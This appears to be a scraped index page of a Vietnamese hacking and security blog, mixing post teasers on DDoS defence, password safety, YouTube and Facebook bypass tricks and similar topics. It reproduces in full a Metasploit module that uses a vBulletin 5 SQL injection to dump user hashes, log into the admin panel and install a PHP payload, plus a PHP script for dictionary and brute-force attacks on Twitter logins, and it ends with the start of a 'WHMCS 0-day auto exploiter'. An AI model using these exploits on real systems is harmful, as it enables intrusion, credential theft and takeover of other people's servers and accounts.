Free Toolbar Cleaner & Remover Tools for your browsers

We have already seen how to manually uninstall some toolbars which may have got installed on your Internet Explorer, Chrome, Firefox, Opera or other browsers. While in most cases it may be possible to uninstall them via the Control Panel or the respective browsers’ Add-ons Manager, in some cases, it may not be possible and you may have to use some tools to remove such persistent toolbars.

Some toolbars which are difficult to remove are Ask toolbar, Babylon toolbar, AVG SecureSearch, SiteSafety, MyFree toolbar, C duit toolbar, ZXY toolbar, Anonymization toolbar, GameNext toolbar, MPire toolbar, MyWebSearch toolbar, NetCraft toolbar, People Search toolbar, Public Record toolbar, Zango toolbar, Elite toolbar, etc. The list is endless, with many wanting to push toolbars for various reasons. It could be for making money with every install, for pushing pop-ups or for tracking down your computer usage.

READ MORE »

Hướng dẫn thay đổi tên Bộ vi xử lý của bạn

Sử dụng thủ thuật này có thể thay đổi tên bộ vi xử lý của chúng ta và làm cho bạn bè ngạc nhiên. Ví dụ chúng ta có thể thay đổi tên bộ vi xử lý từ i3 lên i7 hoặc bất cứ tên nào bạn muốn. Vậy thực hiện điều đó như thế nào?

Chú ý: Thủ thuật này chỉ dành cho mục đích học hỏi.

READ MORE »

vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in vBulletin 5 that has
        been used in the wild since March 2013. This module uses the sqli to extract the
        web application's usernames and hashes. With the retrieved information tries to
        log into the admin control panel in order to deploy the PHP payload. This module
        has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
        Linux distribution.
      },
      'Author'         =>
        [
          'Orestis Kourides', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3522' ],
          [ 'OSVDB', '92031' ],
          [ 'EDB', '24882' ],
          [ 'BID', '58754' ],
          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
        ],
      'Privileged'     => false, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 10000 # Just value big enough to fit any php payload
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
      'DisclosureDate' => 'Mar 25 2013',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
        OptInt.new("NODE", [false, 'Valid Node ID']),
        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
      ], self.class)
  end
 
  def exists_node?(id)
    mark = rand_text_alpha(8 + rand(5))
    result = do_sqli(id, "select '#{mark}'")
 
    if result and result =~ /#{mark}/
      return true
    end
 
    return false
  end
 
  def brute_force_node
    min = datastore["MINNODE"]
    max = datastore["MAXNODE"]
 
    if min > max
      print_error("#{peer} - MINNODE can't be major than MAXNODE")
      return nil
    end
 
    for node_id in min..max
      if exists_node?(node_id)
        return node_id
      end
    end
 
    return nil
  end
 
  def get_node
    if datastore['NODE'].nil? or datastore['NODE'] <= 0
      print_status("#{peer} - Brute forcing to find a valid node id...")
      return brute_force_node
    end
 
    print_status("#{peer} - Checking node id #{datastore['NODE']}...")
    if exists_node?(datastore['NODE'])
      return datastore['NODE']
    else
      return nil
    end
  end
 
  def do_sqli(node, query)
    mark = Rex::Text.rand_text_alpha(5 + rand(3))
    random_and = Rex::Text.rand_text_numeric(4)
    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
    injection << "AND (#{random_and}=#{random_and}"
 
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
      'vars_post' =>
        {
          'nodeid'  => "#{node}#{injection}",
        }
      })
 
    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
      return nil
    end
 
    data = ""
 
    if res.body.to_s =~ /#{mark}(.*)#{mark}/
      data = $1
    end
 
    return data
  end
 
  def get_user_data(node_id, user_id)
    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
 
    return [user, pass, salt]
  end
 
  def do_login(user, hash)
    res = send_request_cgi({
      'uri'           => normalize_uri(target_uri.path, "login.php"),
      'method'        => 'POST',
      'encode_params' => false,
      'vars_get'      => {
        'do' => 'login'
      },
      'vars_post'     => {
        'url'                      => '%2Fadmincp%2F',
        'securitytoken'            => 'guest',
        'logintype'                => 'cplogin',
        'do'                       => 'login',
        'vb_login_md5password'     => hash,
        'vb_login_md5password_utf' => hash,
        'vb_login_username'        => user,
        'vb_login_password'        => '',
        'cssprefs'                 => ''
      }
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
      session = res.get_cookies
    else
      return nil
    end
 
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "admincp", "/"),
      'cookie' => session
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
      return session
    else
      return nil
    end
 
  end
 
  def get_token(response)
    token_info = {
      :session_hash => "",
      :security_token => "",
      :admin_hash => ""
    }
 
    if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
      token_info[:session_hash] = $1
    end
 
    if response =~ /var ADMINHASH = "([0-9a-f]+)";/
      token_info[:admin_hash] = $1
    end
 
    if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
      token_info[:security_token] = $1
    end
 
    return token_info
  end
 
  def get_install_token
    res = send_request_cgi({
      "uri"      => normalize_uri(target_uri.path, "admincp", "product.php"),
      "vars_get" => {
        "do" => "productadd"
      },
      "cookie"   => @session
    })
 
    unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return nil
    end
 
 
    return get_token(res.body.to_s)
  end
 
  def install_product(token_info)
 
    xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
 
<product productid="#{@product_id}" active="0">
  <title>#{@product_id}</title>
  <description>#{@product_id}</description>
  <version>1.0</version>
  <url>http://#{@product_id}.loc</url>
  <versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
  <dependencies>
    <dependency dependencytype="vbulletin" minversion="" maxversion="" />
  </dependencies>
  <codes>
    <code version="*">
      <installcode>
        <![CDATA[
        #{payload.encoded}
        ]]>
      </installcode>
      <uninstallcode />
    </code>
  </codes>
  <templates>
  </templates>
  <stylevardfns>
  </stylevardfns>
  <stylevars>
  </stylevars>
  <hooks>
  </hooks>
  <phrases>
  </phrases>
  <options>
  </options>
  <helptopics>
  </helptopics>
  <cronentries>
  </cronentries>
  <faqentries>
  </faqentries>
  <widgets>
  </widgets>
</product>
    EOF
 
    post_data = Rex::MIME::Message.new
    post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
    post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
    post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
    post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
    post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
    post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
    post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
 
    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'   => "POST",
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productimport"
      },
      'data'     => data
    })
 
    if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
      return true
    elsif res
      fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
    else
      return false
    end
 
  end
 
  def get_delete_token
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productdelete",
        "productid" => @product_id,
        "s" => @session_hash
      }
    })
 
    if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return get_token(res.body.to_s)
    end
 
    return nil
  end
 
  def delete_product(token_info)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'   => "POST",
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productkill"
      },
      'vars_post' => {
        "s"             => token_info[:session_hash],
        "do"            => "productkill",
        "adminhash"     => token_info[:admin_hash],
        "securitytoken" => token_info[:security_token],
        "productid"     => @product_id
      }
    })
 
    if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
      return true
    end
 
    return false
  end
 
  def check
    node_id = get_node
 
    unless node_id.nil?
      return Msf::Exploit::CheckCode::Vulnerable
    end
 
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "index.php")
    })
 
    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
      return Msf::Exploit::CheckCode::Detected
    end
 
    return Msf::Exploit::CheckCode::Unknown
  end
 
  def on_new_session(session)
    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end
 
    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
    end
  end
 
  def exploit
    print_status("#{peer} - Checking for a valid node id...")
    node_id = get_node
    if node_id.nil?
      print_error("#{peer} - node id not found")
      return
    end
 
    print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
    data = do_sqli(node_id, "select count(*) from user")
    if data.empty?
      print_error("#{peer} - Error exploiting sqli")
      return
    end
    count_users = data.to_i
    users = []
    print_good("#{peer} - #{count_users} users found")
 
    for i in 0..count_users - 1
      user = get_user_data(node_id, i)
      report_auth_info({
        :host => rhost,
        :port => rport,
        :user => user[0],
        :pass => user[1],
        :type => "hash",
        :sname => (ssl ? "https" : "http"),
        :proof => "salt: #{user[2]}" # Using proof to store the hash salt
      })
      users << user
    end
 
    @session = nil
    users.each do |user|
      print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
      @session = do_login(user[0], user[1])
      unless @session.blank?
        print_good("#{peer} - Logged in successfully as #{user[0]}")
        break
      end
    end
 
    if @session.blank?
      fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
    end
 
    print_status("#{peer} - Getting the install product security token...")
    install_token = get_install_token
    if install_token.nil?
      fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
    end
 
    @session_hash = install_token[:session_hash]
    @product_id = rand_text_alpha_lower(5 + rand(8))
    print_status("#{peer} - Installing the malicious product #{@product_id}...")
    if install_product(install_token)
      print_good("#{peer} - Product successfully installed... payload should be executed...")
    else
      # Two situations trigger this path:
      # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
      # 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
      # Because of that fail_with isn't used here.
      return
    end
 
    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end
 
    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
    end
 
  end
 
 
end

Nguồn: http://www.exploit-db.com/exploits/30212/

READ MORE »

Những thủ thuật Youtube thú vị bạn phải biết

Không ngạc nhiên khi tất cả chúng ta đều rất quen thuộc với cái tên Youtube. Đây là kênh Video trực tuyến lớn nhất trên thế giới. Bất cứ khi nào bạn muốn xem bất kì video âm nhạc nào mới phát hành, chương trình yêu thích mà bạn bỏ lỡ trên TV, thể thao trực tiếp, những video hài hước, những thủ thuật thú vị, video công nghệ và nhiều hơn thế nữa có sẵn bất cứ khi nào trên Youtube.

 

Đó là những lý do để chúng ta phụ thuộc vào Youtube cho nhiều mục đích khác nhau nhưng ngoài ra nó có rất nhiều thủ thuật mà có thể mang lại cho bạn một cách tốt hơn và hiệu quả hơn để sử dụng YouTube. Vì vậy, ở đây tôi sẽ chia sẻ một số thủ thuật Youtube thú vị và rất hữu ích với bạn.

READ MORE »

The Beginning Of The Web Pages And Google Hacking

ABSTRACT

The evolution of technology has reached a point that necessitated the emergence of communication protocols, there was then the spread of the HTTP protocol and the HTML language initially, in the early 90s, the web pages have become a major means of communication between users, governments, institutions and professionals.

The "HyperText Transfer Protocol" is a protocol application responsible for handling requests and responses between "client and server" in the "World Wide Web", came up with the purpose of distributing information over the Internet, also to communicate between computers and specifications would be performed as transactions between clients and servers, through the use of rules.

READ MORE »

Clickjacking: Quá khứ, hiện tại và tương lai

Clickjacking là một loại hình tấn công liên quan trực tiếp với người dùng và không thể diễn ra nếu không có sự tham gia của người dùng. Theo nghĩa nào đó, Clickjacking một kỹ thuật nhằm đánh cắp các “cú click” của người dùng.

READ MORE »

Tối ưu hoá trình duyệt Firefox để duyệt web nhanh hơn

Firefox lúc hoạt động cũng như khi ở trạng thái minimize đều chiếm dung lượng bộ nhớ rất nhiều. Tuy nhiên nếu bạn biết một số tính năng ẩn của nó, sẽ cải thiện được đáng kể tốc độ của phần mềm này. Thủ thuật nhỏ và đơn giản dưới đây sẽ giúp bạn giải quyết vấn đề này,

READ MORE »

DDoS và nguyên tắc hành động cụ thể

Sau hai notes:
- DDoS và nguyên tắc chống chọi.
- DDoS và nguyên tắc phân tích gói tin.


Một số bạn hỏi tôi "hành động cụ thể" ra làm sao? Đây là câu hỏi khó vì mitigate DDoS là công việc cực kỳ khó khăn. Việc này chẳng những đòi hỏi phải am hiểu giao thức mạng một cách tinh tế để xác định mình đang bị tấn công như thế nào mà còn đòi hỏi thấu đáo mô hình, cấu trúc, công nghệ và cách quản lý của hệ thống đang bị lâm nạn. Không có một thiết bị kỳ diệu nào có thể tự động nhận diện và khắc phục DDoS một cách dễ dàng cả.

Như tôi đã đề cập trong bài đầu tiên: "Cản lọc không dừng lại ở MỖI TẦNG mà ở trên TẤT CẢ CÁC TẦNG GIAO THỨC bất cứ nơi đâu có thể được, thậm chí phối hợp giữa các tầng." và việc này chỉ có thể do NGƯỜI THẬT thực hiện. Hãy bàn đến mô hình để nắm rõ hơn tại sao việc thấu đáo nó là tối quan trọng.
READ MORE »

DDoS và nguyên tắc phân tích gói tin

Như đã đề cập ở bài trước (xem tại đây)

Giảm thiểu tác hại của DDoS có hai hướng chính:
1) Giảm thiểu bằng cách cản lọc những đặc điểm cụ thể.
2) Giảm thiểu bằng cách cản lọc theo ấn định số lần truy cập trong một khoản thời gian (nếu không tìm ra được đặc điểm cụ thể).

Từ những thông tin nào có thể giúp mình thực hiện việc giảm thiểu ấy? Cách khó nhất, tỉ mỉ nhất nhưng cũng chính xác nhất là lấy thông tin từ những gói tin bắt được trong lúc chúng tràn vào mục tiêu (để thực hiện việc DDoS).
READ MORE »

DDoS và nguyên tắc chống chọi

Tóm tắt những điểm tối quan trọng trong việc chống chọi với DDoS (distributed denial of service attack) cho những ai quan tâm.

- DDoS có nhiều dạng, nhiều biến thái tấn công nhưng tựu trung có một mục đích: làm người dùng không thể sử dụng được dịch vụ.

- DDoS có hai dạng chính:
1) làm ngập băng thông khiến cho người dùng không thể truy cập dịch vụ.
2) làm cho dịch vụ hoàn toàn tê liệt vì hết tài nguyên khiến cho người dùng không thể truy cập dịch vụ.

Chống đỡ hai dạng trên đều đòi hỏi gia tăng tài nguyên (băng thông, CPU, diskspace, memory). Tài nguyên càng phát tán rộng ra nhiều network càng tốt.

READ MORE »

Bảo mật cá nhân - Sử dụng máy công cộng - Phần 2

Trong bài trước (xem tại đây), ba thủ thuật đơn giản đã được giới thiệu nhằm giảm thiểu hiểm hoạ "mất mật khẩu" khi dùng máy công cộng. Phần thứ nhì đi sâu vào việc chuẩn bị một biện pháp khác có khả năng giảm thiểu hiểm hoạ bị mất mật khẩu ở mức độ tốt hơn. Tuy nhiên, nó đòi hỏi một quy trình chuẩn bị khá tỉ mỉ.


Tạo và sử dụng USB key có chứa phần mềm quản lý mật khẩu:
Đây có lẽ là biện pháp an toàn nhất khi sử dụng máy tính công cộng để đăng nhập nếu máy tính công cộng ấy cho phép gắn USB key vào máy. USB key là một thiết bị nhỏ gọn, khá rẻ tiền và thông dụng:

Bạn có thể mua một USB key ở bất cứ một tiệm bán đồ máy tính nào với dung lượng nhỏ (vì không cần dung lượng lớn). Một USB key chừng 64Mb là thừa để dùng rồi. Quy trình chuẩn bị này cần thực hiện trên một máy SẠCH, có nghĩa là bạn tin tưởng máy ấy không có mã độc.

READ MORE »

Bảo mật cá nhân - Sử dụng máy công cộng - Phần 1

Vài năm gần đây, Internet và máy tính trở thành một phần của mọi sinh hoạt hàng ngày, từ chuyên gia cho đến các cháu học sinh từ các bà nội trợ đến các ông bà cụ. Không may, tình trạng "mất mật khẩu", "bị đánh cắp mật khẩu", "mất tài khoản" trở thành chuyện bình thường đến mức đáng sợ. Tuy vậy, nếu trang bị một số kiến thức căn bản và sự cẩn thận đúng mức thì có thể giảm thiểu phần lớn tình trạng "bị mất cắp". Bài viết này tập trung vào tình trạng bảo mật của máy tính và người dùng Internet ở Việt Nam cho người dùng sử dụng máy trên hệ điều hành Windows.

READ MORE »

Chín thói quen xấu cần bỏ nếu muốn theo ngành CNTT

1. Không chịu đọc tài liệu trước khi dùng:
Đây là một trong những thói quen tệ hại nhất nhưng lại thường gặp nhất. Có lẽ thói quen này nảy sinh từ tính thân thiện của "giao diện đồ hình" (GUI) khiến cho người dùng bồi đắp thói quen mò mẫm mà không cần đọc hướng dẫn nhưng cũng sử dụng được máy. Việc này không có gì đáng ngại đối với người dùng (rất) bình thường. Tuy nhiên, nếu bạn có ý định theo đuổi ngành CNTT một cách nghiêm túc thì hãy bỏ ngay thói quen tai hại này bởi vì đây là rào cản lớn nhất cho sự phát triển. Kiến thức vững chắc không phải... mò mà ra. Tài liệu hướng dẫn không phải vô cớ mà được viết ra.
READ MORE »

[PHP] Twitter Brute Force

<?php
/////////////////////////////////////////////////////
////Twitter Brute Force By Mauritania Attacker//////
///////////////////////////////////////////////////

///////////////////////////////////////////////////
////Changing Description won't make you the Coder/ 
/////////////////////////////////////////////////


////////////////////////////////////////////////////////////////////////////
# This script was created to Brute Force Twitter Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
///////////////////////////////////////////////////////////////////////////

$dic ="pass.txt";
//////////////////////////////////////////////////////////////////////////



echo "
<title>Twitter Brute Force By Mauritania Attacker</title>
</head>
<style type='text/css'>
body {


font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:BLUE;
border-color:#CCCCCC;
}
.alert {
    color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
        </td>
    </tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'>

            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
             
            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
                <form method='post'>
                    Target User:<br>
                    <input name='username' type='text' /><br><br>
                    <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
                </form>
            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
             
            </div>
        </td>
    </tr>
</table>
";
// Sets variables and retrives twitter error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
    $username = $_POST['username'];
    $headers = array(
    "Host: stream.twitter.com",
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
    "Accept-Encoding: text", # No gzip, it only clutters your code!
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Date: ".date(DATE_RFC822)
    );
    $c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
    curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
    curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
    curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
    $wrong = curl_exec($c); // Get it
    curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
    $Dictionary = file("$dic");
    for ($Position = 0; $Position < count($Dictionary); $Position++) {
        $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
        if(check_correct($username, $Dictionary[$Position])) {
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
        </td>
    </tr>
</table>
</body>
</html>");
        }
    }
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
y attack.</b></div>
        </td>
    </tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
    for ($Pass = 0; $Pass < 2; $Pass++) {
        if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
        if(check_correct($username, $Pass)) {
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
        </td>
    </tr>
</table>
</body>
</html>");
        }
    }
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
ce attack.</b></div>
        </td>
    </tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
        global $wrong, $headers;
        $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
        curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
        curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
        curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
        curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
        $str = curl_exec($c); // Get it
        curl_close($c);
        if($str != $wrong) {return true;}
        else {return false;}
}

?>

Source: http://pastebin.com/

Thủ thuật tối ưu hóa khi lập trình PHP

Tối ưu và tăng tốc xử lý khi lập trình PHP không chỉ giúp website chạy ổn định mà còn giúp tiết kiệm tài nguyên xử lý của máy chủ website.

Khi học và làm việc với PHP lần đầu, đa phần các lập trình viên đều có xu hướng học lướt các kiến thức căn bản để tập trung vào phần viết ứng dụng. Cũng chính vì lý do đó mà phần lớn những điểm nhấn quan trọng trong PHP thường là sẽ bị bỏ qua.

Bài viết này, với mong muốn tổng hợp và đưa đến cái nhìn bao quát, đầy đủ trong lập trình PHP. Qua đó giúp các bạn có cái nhìn đầy đủ và hiểu sâu các vấn đề hơn.

READ MORE »

How to bypass Facebook photo tag verification or identify photos of your friends

Okay so i am gonna show you guys a little trick to bypass the Facebook Verification (Verify Images).

READ MORE »

Những add-on hỗ trợ SEO website

1. Seoquake (Firefox) : https://addons.mozilla.org/vi/firefox/addon/seoquake-seo-extension/

Một tiện ích không thể thiếu. Cung cấp cho bạn những thông tin cơ bản như PR, số lượng index, rank alexa, tuổi đời domain, backlink mạng xã hội, internal link và external link.

Đặc biệt phiên bản mới cung cấp phân tích tổng thể ( Diagnosis ), cho bạn các thông số cực kỳ cần thiết như title, description, các thẻ H1, H2 … Một công cụ tuyệt vời thay thế cho Woorank.com ( giờ đã thu phí )

READ MORE »

Hướng dẫn bảo mật tài khoản Facebook

Thực ra thì mình thấy có khá nhiều bài viết về bảo mật tài khoản trên mạng xã hội rồi (đặc biệt là Facebook), nên bài viết này Juno_okyo sẽ viết và chia sẻ theo kinh nghiệm cá nhân.

1. Sử dụng Mật khẩu mạnh

Một mật khẩu mạnh:

• Có ít nhất 15 kí tự;
• Có chữ hoa;
• Có chữ thường;
• Có chữ số;
• Có kí tự như: ` ! " ? $ ? % ^ & * ( ) _ - + = { [ } ] : ; @ ' ~ # | \ < , > . ? /
• Không giống như mật khẩu trước đó của bạn (trường hợp đổi mật khẩu).
• Không phải là tên của bạn.
• Không phải là tên đăng nhập.
• Không phải là tên bạn bè của bạn.
• Không phải là tên thành viên trong gia đình bạn.
• Không phải là một từ trong từ điển.
• Không phải là một tên chung.
• Không phải là một mẫu trên bàn phím kiểu như: qwerty, asdfghjkl, or 12345678.

Nếu "quá khó" để nghĩ ra một mật khẩu đủ mạnh và tuân theo các quy tắc an toàn trên, bạn có thể sử dụng các công cụ tạo mật khẩu mạnh ngẫu nhiên như strongpasswordgenerator.com

READ MORE »

Một số cấu hình trên file .htaccess

1. .htaccess là gì?

1.1. .htaccess là gì

.htaccess là một file cấu hình sử dụng cho các web server chạy Apache. .htaccess dùng để thiết lập các tùy chọn: thực thi hay loại bỏ các chức năng, tính năng của Apache

READ MORE »

Tìm hiểu về Local Attack

I. Khái niệm chung

• Thông thường, khi host một site lên server thì người dùng sẽ được cấp một tài khoản người dùng và một thư mục để quản lý site của mình. Ví dụ tài khoản user1 được cấp thư mục /home/user1 để quản lý site của user1. Tương tự như vậy, tài khoản user2 được cấp thư mục /home/user2 để quản lý site của user2. Bằng cách nào đó, hacker có thể chiếm giữ /home/user2 và dùng các script (shell) để truy nhập vào /home/user1. Cách thức tấn công dựa vào các script ở site của user này để tấn công vào site của user khác trên cùng một server được gọi là Local Attack.

READ MORE »

Fast flux DNS

I. Khái niệm

- Fast flux DNS là một kĩ thuật các botnet sử dụng để che giấu các trang web lừa đảo, có mã độc phía sau một mạng các máy tính bị kiểm soát đóng vai trò là proxy. Những máy tính trong mạng này có các bản ghi DNS thay đổi rất nhanh, một số trường hợp chỉ trong vòng vài phút. Cơ cấu thay đổi bản ghi DNS nhanh chóng này khiến việc tìm ra và chặn đứng các hoạt động bất hợp pháp trở nên khó khăn hơn nhiều.

- Fast flux DNS được nhận biết vào tháng 11/2006 nhưng đến tháng 7/2007 mới bắt đầu gây được sự chú ý.

READ MORE »

Các lầm tưởng thường gặp về bảo mật WiFi

Những lời đồn đại về việc tăng tính bảo mật cho mạng WiFi mà ta nên gạt bỏ ngay từ bây giờ.

Đi cùng với sự tiếp nhận mạnh mẽ của cộng đồng và các hãng sản xuất phần cứng đối với công nghệ Wifi, các công nghệ bảo mật đi kèm với chuẩn mạng không dây này cũng theo đó mà ngày càng phát triển.

Vào những ngày đầu khi mà Wifi còn mới chập chững bước vào thị trường, ta có thể dễ dàng bắt gặp mẹo và nhiều khuyến cáo về bảo mật từ các nguồn tin không chính thức trên mạng Internet.

READ MORE »

How to bypass age restriction on Youtube?

Video sử dụng làm demo trong bài viết này:

http://www.youtube.com/watch?v=ngPNKXHQe0c

Cách 1:
Các bạn có thể bypass bằng cách sửa lại URL theo cấu trúc sau:

http://www.youtube.com/v/VIDEO_ID

Ví dụ:

http://www.youtube.com/v/ngPNKXHQe0c

Tức là các bạn thay đoạn watch?v= thành v/.

READ MORE »

How to check Clanwong.com?

Có đứa bạn nhờ check site này: http://clanwong.com/

Mã nguồn thì IPB, mà mình thì chưa chơi với mã nguồn này bao giờ cả =.=

Sau khi tìm đủ các dork trên Google để kiếm exp thì ngán. Quay sang phương án Local.

Let's go!

READ MORE »

[PHP] WHMCS 0-day Auto Exploiter <= 5.2.8

<?php
/*
*****************************************************
  WHMCS 0day Auto Exploiter <= 5.2.8
  Coded by g00n - Skype: t3hg00n
   wwww.xploiter.net
*****************************************************
Preview:
http://i.imgur.com/qB726Gm.png
In action:
